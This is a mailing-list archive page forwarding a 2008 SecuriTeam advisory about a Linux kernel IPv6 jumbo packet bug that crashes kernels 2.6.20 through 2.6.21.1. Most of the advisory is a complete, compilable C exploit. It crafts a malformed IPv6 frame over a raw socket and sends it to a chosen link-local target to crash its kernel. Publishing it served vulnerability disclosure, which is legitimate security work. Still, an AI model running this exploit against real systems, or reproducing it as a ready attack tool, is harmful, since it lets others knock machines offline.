ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] Linux Kernel IPv6 Jumbo Bug




> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Tuesday, January 15, 2008 9:12 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] Linux Kernel IPv6 Jumbo Bug
>
>
> - - - - - - - - -
>
>
>
> Linux Kernel IPv6 Jumbo Bug
>
>
>
> When the Linux kernel receives a malformed IPv6 jumbo packet
> - it will drop the packet and try to write some statistics.
> In the affected kernel versions it is not assured that the
> structure which provides the information is correctly
> initialized - resulting in a kernel crash.
>
>
> Vulnerable Systems:
>  * Linux kernels version 2.6.20 up to and including 2.6.21.1
>
> Exploit:
> /*
>  * Clemens Kurtenbach <ckurtenbach at s21sec . com>
>  * PoC code for exploiting the jumbo bug found in
>  * linux kernels >=2.6.20 and <=2.6.21.1
>  * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash -
> http://www.milw0rm.com/exploits/4893
>  *
>  */
>
>
> /* io */
> #include <stdio.h>
> #include <string.h>
> #include <stdlib.h>
>
> /* network */
> #include <sys/socket.h>
> #include <linux/if_packet.h>
> #include <linux/if_ether.h>
> #include <linux/if_arp.h>
> #include <netdb.h>
> #include <linux/if.h>
>
> #define MY_FRAME_LEN 1145
>
> char *resolve6(unsigned char *target) {
>  char *ret_addr;
>  struct in6_addr my_in6;
>  char *glob_addr = (char *) &my_in6;
>  struct addrinfo addr_hints, *addr_result;
>  unsigned char out[64];
>
>  memset(&addr_hints, 0, sizeof(addr_hints));
>  addr_hints.ai_family = AF_INET6;
>
>  if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
>   printf("getaddrinfo() error\n");
>   exit(1);
>  }
>  if(getnameinfo(addr_result->ai_addr,
> addr_result->ai_addrlen, out, sizeof(out), NULL, 0,
> NI_NUMERICHOST) != 0){
>   printf("getnameinfo() error\n");
>   exit(1);
>  }
>  if(inet_pton(AF_INET6, out, glob_addr) < 0) {
>   printf("inet_pton() error\n");
>   exit(1);
>  }
>  if((ret_addr = malloc(16)) == NULL) {
>   printf("malloc() error\n");
>   exit(1);
>  }
>  memcpy(ret_addr, my_in6.s6_addr, 16);
>  return ret_addr;
> }
>
> int main(int argc, char *argv[]) {
>
>  if (argc < 4) {
>   printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3>
> <00:11:22:33:44:55> <eth0>\n");
>   exit(1);
>  }
>
>  /* handle IPv6 destination */
>  unsigned char *dest_ip = resolve6(argv[1]);
>
>  /* handle MAC */
>  unsigned char dest_mac[7];
>  sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
>    (unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
>    (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
>    (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);
>
>  /* handle interface */
>  unsigned char *iface;
>  iface = argv[3];
>
>  /* buffer for ethernet frame */
>  void *buffer = (void*)malloc(MY_FRAME_LEN);
>
>  /* pointer to ethenet header */
>  unsigned char *etherhead = buffer;
>  struct ethhdr *eh = (struct ethhdr *)etherhead;
>
>  /* our MAC address */
>  unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };
>  unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};
>
>  /* prepare socket */
>  int s;
>  s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
>  if (s < 0) {
>   printf("cannot create socket: [%d]\n",s);
>   exit(1);
>  }
>
>  /* RAW communication */
>  struct sockaddr_ll socket_address;
>  socket_address.sll_family = PF_PACKET;
>  socket_address.sll_protocol = htons(ETH_P_IP);
>  socket_address.sll_ifindex = if_nametoindex(iface);
>  socket_address.sll_hatype = ARPHRD_ETHER;
>  socket_address.sll_pkttype = PACKET_OTHERHOST;
>  socket_address.sll_halen = ETH_ALEN;
>
>  /* set the frame header */
>  memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
>  memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
>  eh->h_proto = 0xdd86; // IPv6
>
>  /* the buffer we want to send */
>  unsigned char bad_buffer[] = {
>   0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00,
> 0x00, 0x00, 0x00,
>   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00,
>   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00,
>   0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };
>
>  memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);
>
>  /* overwrite our src and dst ip */
>  memcpy((void*)(buffer+22), (void*)src_ip, 16);
>  memcpy((void*)(buffer+38), dest_ip, 16);
>
>  /* send the buffer */
>  int send_result = 0;
>  send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct
> sockaddr*)&socket_address, sizeof(socket_address));
>  if (send_result == -1) {
>   printf("could not send frame: [%d]\n", send_result);
>   exit(1);
>  }
>  else printf("frame send to ip [%s] with mac [%s] on iface
> [%s]\n",argv[1],argv[2],argv[3]);
>
>  return 0;
> }
>
> // milw0rm.com [2008-01-11]
>
>
> Additional Information:
> The information has been provided by Clemens Kurtenbach
> <mailto:ckurtenbach@xxxxxxxxxx> .
> The original article can be found at:
> http://blog.s21sec.com/2008/01/ipv6-bug-in-linux-kernel.html
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>



 




Copyright © Lexa Software, 1996-2009.